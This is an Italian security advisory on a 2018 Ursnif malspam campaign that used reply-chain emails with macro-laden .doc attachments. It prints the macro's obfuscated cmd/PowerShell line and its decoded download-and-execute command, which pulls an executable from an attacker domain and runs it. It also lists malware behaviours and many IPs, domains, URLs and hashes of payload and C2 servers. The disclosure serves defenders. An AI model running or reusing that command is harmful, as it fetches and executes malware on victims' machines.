Nuova campagna di Malspam Italiana volta a distribuire il malware Ursnif

20/11/2018

malspam malware phishing ursnif

Negli ultimi giorni sono emerse eventi legati alla diffusione malware appartenente alla famiglia Ursnifcapace di trafugare credenziali, intercettare dati e fornire accesso backdoor sulle macchine compromesse.

Dal monitoraggio e dalle attività di info-sharing con altre strutture sono emersi tre recenti e distinti casi. I ricercatori Yoroi hanno rilevato una campagna di Malspam che si basa sostanzialmente sulle stesse tecniche di ingegneria sociale utilizzate nelle precedenti campagne di Ursnif, ossia utilizza come vettore di attacco email di risposta fittizie a comunicazioni email realmente intercorse tra la vittima ed il mittente, in modo che i messaggi fraudolenti appaiano attendibili agli occhi dei destinatari.

Una campagna simile è stata tracciata anche dai ricercatori di ReaQta, in tal caso dalle analisi condotte si evince che il vettore di attacco della campagna è principalmente rivolto a un pubblico italiano. Il repository per il download dei sample,oltre che in Italia, è stato identificato in Russia, Ucraina, Paesi Bassi e Stati Uniti.

Un ulteriore elemento riguarda la segnalazione pervenuta dalla constituency del CERT-PA che confermerebbe la diffusione della campagna sul territorio nazionale con impatto anche su Enti della PA.

Di seguito uno screenshot dimostrativo del file malevolo consegnato come allegato tramite posta elettronica:

Nuova modalità di offuscamento

Il malware viene distribuito attraverso un file con estensione .doc contenente una macro malevola. Nel caso quest’ultima venga attivata, verrà eseguito il codice malevolo tramite uno script powershell che provvede al download del payload da una risorsa remota.

Come evidenziato nell’immagine, la macro offuscata presenta al suo interno un’istruzione che prevede l’esecuzione di un comando tramite la shell di Windows. Il secondo parametro 0 (ovvero 72-(35*2+2)) permette l’esecuzione in modalità “hidden”.

Il codice shell vero e proprio viene estratto tramite il comando Shapes(“abszde6p”).AlternativeText che estrae il “testo alternativo” di un “oggetto” Word denominato “abszde6p”. Tale funzionalità è prevista solo a partire dalla versione di Word 2007.  Infatti nella modalità di compatibilità con le versioni precedenti a Word 2007 non è impossibile intercettare tale oggetto. Di conseguenza si suppone che il  file sia stato creato nel formato più recente “.docx” e successivamente convertito nel formato “.doc” per nascondere la nocività delle informazioni contenute in tale campo.

Come mostrato nell’immagine seguente, convertendo il documento in “.docx” è possibile risalire all’oggetto ed al codice offuscato eseguito nella shell:

Il codice è

Shell(“cMd.EXE /c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBzAGMAbwBwAG8AZQBpAGQAaQBkAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AHkAdQBuAG8AMQAuAHcAbwBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXABmADUAMABhAGYANgA4AGYALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcAGYANQAwAGEAZgA2ADgAZgAuAGUAeABlACcAOwAgAEUAeABpAHQA”,0)

e richiama powershell.exe con un parametro passato come stringa esadecimale codificata in base64. Procedendo con la decodifica dei dati, si ottiene il comando completo:

cMd.EXE /c poWerShelL.exe -e (New-Object System.Net.WebClient).DownloadFile (“http://scopoeidid.com/YER/pelim.php?l=yuno1.wos”, $env:APPDATA + ‘\f50af68f.exe’);Start-Process $env:APPDATA’\f50af68f.exe’; Exit

Come è facilmente intuibile, il malware scarica il payload dall’URL hxxp://scopoeidid.com/YER/pelim.php?l=yuno1.wos, quindi salva ed esegue il file eseguibile denominato f50af68f.exe.

Azioni malevoli del malware

  • Enumera il File System
  • Usa ping.exe per la verificare l’esistenza di connettività
  • Infetta dispositivi USB collegati per finalità di replicazione
  • Utilizza WMI per la creazione di processi
  • Utilizza DLL di Internet Explorer per usufruire della modalità “hidden”
  • Compila codice C# e VB.Net da iniettare negli eseguibili di sistema
  • Rileva l’utilizzo di sandbox e implementa funzionalità di anti debug intercettando le funzioni NtQuerySystemInformation(SystemKernelDebuggerInformation) e IsDebuggerPresent
  • Raccoglie dati relativi al sistema infettato e li invia ad un webserver (C&C) remoto
  • Si auto elimina una volta infettato il sistema

Catena di infezione

L’immagine sottostante mostra chiaramente la catena dei processi in seguito all’attivazione della macro:

 

Indicatori di compromissione (fonte CERT-PA)

IP 

  • 216.54.50.202
  • 216.109.193.254
  • 66.96.187.1
  • 66.96.187.10
  • 46.17.46.152

FILE

  • f50af68f.exe
    • SHA256 d197e66832361e674d210d564d2a9692d604a81ec3cc0356e18441d421ad1c86
  •  regione_campania.doc
    • SHA256 3be6acc6516c8ed7113c600cf94418b3852c9b4a9d3a347178d639611ff1092d

URL

  • hxxp://scopoeidid.com/YER/pelim.php?l=yuno1.wos
  • hxxp://abbtggmaazzrt.com/favicon.ico
  • hxxp://abbtggmaazzrt.com/images/AO46Ib29/wlAul5rWWXhiOqr6gTX3nQL/GRjeFE1cVw/nAhKsuVLljPAep80s/Y3kgq_
  • hxxp://abbtggmaazzrt.com/images/AO46Ib29/wlAul5rWWXhiOqr6gTX3nQL/GRjeFE1cVw/nAhKsuVLljPAep80s/Y3kgq_2BeJsL/CFbeeX1o3om/FckI2BkKn07qSc/O2I5lXF4ANvw89oB3_2Fe/bQBPjF_2BSl2UhnW/_2B3GVSTKSX5gIM/CxooB0doo/U9.avi
  • hxxp://abbtggmaazzrt.com/images/gtA8_2FSZbJaRrUOoGK58/clLnR4L8vdeEpv3J/xr6_2Fedyx2ro8R/ALhgGMTTAYSKj
  • hxxp://abbtggmaazzrt.com/favicon.ico~
  • hxxp://abbtggmaazzrt.com/images/gtA8_2FSZbJaRrUOoGK58/clLnR4L8vdeEpv3J/xr6_2Fedyx2ro8R/ALhgGMTTAYSKjRKMoT/l0vBKi952/DGK_2FYjG_2BBdxTQR_2/B1dJwhnG_2B8JkGZWzL/386momS1gbk0mGG0VbOfEQ/_2FbExGljSjG2/OM_2BoBeMX/fos.avi

Indicatori di compromissione (fonte Yoroi)

Malspam:

  • Sender:
    • <MITTENTI NOTI IN CONVERSAZIONI PRECEDENTI>
  • Subject:
    • Re: <OGGETTO PRECEDENTEMENTE UTILIZZATO>
  • Body:
    • Messaggi di posta legati a scambi email pregressi in calce
  • Attachment:
    • <SENDER_DOMAIN_OR_COMPANY_NAME>.doc

Dropurl:

  • ninasukash[.com
  • hxxp://ninasukash[.com/YER/pelim.php

C2 (ursnif):

  • cjwefomatt[.com
  • ticrerfgiff[.com
  • dubbergergbb[.com
  • hxxp://cjwefomatt[.com/images/
  • 46.17.46[.173

Hash (sha256):

  • doc file:
    • sha256 dffd5b4fa192eb1ee8b21e8fb586827329e702423024be9fa3b2dc571eca48de
  • exe file:
    • sha256 ebef48eb0df99befd7040c466f7d9cb1a976e2c048eea280e99f49b296342301

Indicatori di compromissione (fonte ReaQta)

SHA1 DOC:

  • Logisticaservicesrl.doc
    • 8d9c9a8d24ff4e41c19c8583e3c5c48db52f147e
  • GRobotica.doc
    • 963CD36B2FBDC70F9B3AF4ED401A28BEB6F969F9
  • Indalgo.doc
    • EDF48AC80E2505241BB4A0378363A3C79FD864B8
  • Network_Connections.doc
    • F31155687987ACE4D9F547E069789645680D7272
  • Logisticaservicesrl.doc
    • ae4e6c49d120fa07c1112e5b70cd078654a1b009
  • Conform.doc
    • b902ccbb81c300da92c7428fc30cdc252233249e
  • Ligoratti.doc
    • cc42e4b4a0d1a851367eb5265b4408c64aa56dab
  • MetroBlu.doc
    • e6934b62bab58efcd64db4c9774b0f9d908715a1

SHA1 EXE:

  • praf3.xap
    • 05450C90E23CFBDFC5122D0004A6CA1A51E769C5
  • ledo5.xap
    • 2600D8F9301DB916949E0D46872768022F808A7C
  • crypt_2_3105.exe
    • 28B78C0B4C52222D3F6BDB9583D7EEF82EBFCEC4
  • hereye.exe
    • 3AB9EE0B9B8E3098E1252293FC7D03E43CC69590
  • ledo6.xap
    • 4E36269327981F417D59AFDED3DDE2D11BA99149
  • ledo2.xap
    • 6119095DFC0B80C6948B50E13EACAFF8929B56E3
  • ledo3.xap
    • 6502563541E8830D418A3877324F42DF0B510CE5
  • ledo1.xap
    • 7F704D1CC07575854E98783AF059371E2FCCC4E8
  • praf1.xap
    • 99405F84372E8CBDF8B85D6C5F749FF3FFEA2764
  • ledo4.xap
    • A1C13D9922C58C38E713D3EAFCA70A2A2589C7CC
  • ledo7.xap
    • A1DEC1D4523E2E6670F6E45A3924DC4C0121CFFE
  • praf5.xap
    • AC4B5DD954EFCC11FB2AFAB0FDE27476CB0615CF
  • praf6.xap
    • AEB75D73E802A7AF08400CED4252CA4455C0DA82
  • praf7.xap
    • C9D09E8767344EC32FD6732173D9557F9C74A802
  • praf2.xap
    • CBD009F09109B38C4BEC3C55E827C8FCED057D2E
  • crypt_3100.exe
    • DEE85E063B55D8CF829950E61285078E1BD35164
  • praf4.xap
    • E5C48455F03C18F04D581AE1F95C41C81F653EF2
  • wync1.xap
    • EB3100700F3D95B21892B045A5FF32EBAD38A831

PAYLOAD SERVER & C2:

  • hxxp://46.17.47.99/
  • hxxp://cythromatt.com
  • hxxp://djecalciar.com
  • hxxp://hutedredea.com
  • hxxp://mnesenesse.com
  • hxxp://nosenessel.com
  • hxxp://ostrolista.com
  • hxxp://pilewitene.com
  • hxxp://podylostol.com
  • hxxp://roidlandev.com
  • hxxp://scopoledod.com
  • hxxp://shumbildac.com
  • hxxp://suggenesse.com
  • hxxp://tifyiskeri.com
  • hxxp://uvurinestl.com
  • hxxp://wifilhonle.com

IP:

  • 185.159.128[.]78 (Russia Federation)
  • 185.180.198[.]222 (Netherlands)
  • 185.180.198[.]228 (Netherlands)
  • 185.180.198[.]229 (Netherlands)
  • 185.180.198[.]230 (Netherlands)
  • 192.162.244[.]12 (Russian Federation)
  • 192.162.244[.]169 (Russian Federation)
  • 192.162.244[.]171 (Russian Federation)
  • 204.79.197[.]200 (United States)
  • 204.79.197[.]200 (United States)
  • 217.147.170[.]91 (Ukraine)
  • 217.147.170[.]94 (Ukraine)
  • 46.17.47[.]4 (Russian Federation)
  • 46.17.47[.]99 (Russian Federation)ù
  • 46.29.160[.]132 (Russia Federation)
  • 62.149.140[.]59 (Italy)
  • 92.242.63[.]202 (Russian Federation)
  • 93.184.220[.]29 (United States)
  • 94.103.81[.]168 (Russian Federation)
  • 94.103.82[.]216 (Russian Federation)
  • 95.181.198[.]115 (Russian Federation)
  • 95.181.198[.]116 (Russia Federation)
  • 95.181.198[.]72 (Russian Federation)

Indicatori di compromissione aggiuntivi rilevati da fonte closint

Di seguito gli IoC associati al malware Ursnif rilevati in data odierna da fonte riservata e che per comodità vengono forniti in formato testuale scaricabile:

  • IoC (.txt) – File globale : Domini, Urls, hash files (SHA1, MD5 e SHA256), IPv4
  • IoC (HASHr.txt) – Lista dei soli hash file da utilizzare in combinazione con il tool HASHr

Aggiornamento del 26/11/2018 

Nuovi Indicatori di compromissione

  • IoC (.txt) – File globale : Domini, Urls, hash files (SHA1, MD5 e SHA256), IPv4
  • IoC (HASHr.txt) – Lista dei soli hash file da utilizzare in combinazione con il tool HASHr